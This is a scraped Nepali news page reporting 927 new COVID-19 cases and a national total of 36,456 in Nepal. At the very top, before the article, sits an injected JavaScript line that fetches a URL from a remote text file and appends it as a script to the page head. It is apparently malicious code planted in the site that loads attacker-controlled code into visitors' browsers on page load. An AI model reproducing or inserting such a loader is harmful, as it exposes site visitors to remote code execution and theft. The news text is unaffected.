;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ३६ हजार ४ सय नाघ्यो कोरोना संक्रमितको संख्या : आज ९२७ जनामा पुष्टि – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • ३६ हजार ४ सय नाघ्यो कोरोना संक्रमितको संख्या : आज ९२७ जनामा पुष्टि
समाचार

३६ हजार ४ सय नाघ्यो कोरोना संक्रमितको संख्या : आज ९२७ जनामा पुष्टि

कोरोना

भदौ १२,

काठमाडौं । पछिल्लो २४ घण्टामा ९२७ जनामा कोरोना संक्रमण पुष्टि भएको छ । स्वास्थ्य तथा जनसंख्या मन्त्रालयका अनुसार १० हजार २२९ वटा स्वाब परीक्षण हुँदा ९२७ जनामा कोरोना संक्रमण पुष्टि भएको हो । नेपालमा कोरोना संक्रमितको कुल संख्या ३६ हजार ४५६ पुगेको छ ।

पछिल्लो २४ घण्टामा कोरोना संक्रमण निको भई १६९ जना डिस्चार्ज भएका छन् । शुक्रबारसम्म निको हुनेको संख्या २० हजार २४२ जना रहेको छ । हाल १६ हजार १९ जना आइसोलेसनमा छन् ।file Photo

फेसबुक प्रतिक्रियाहरु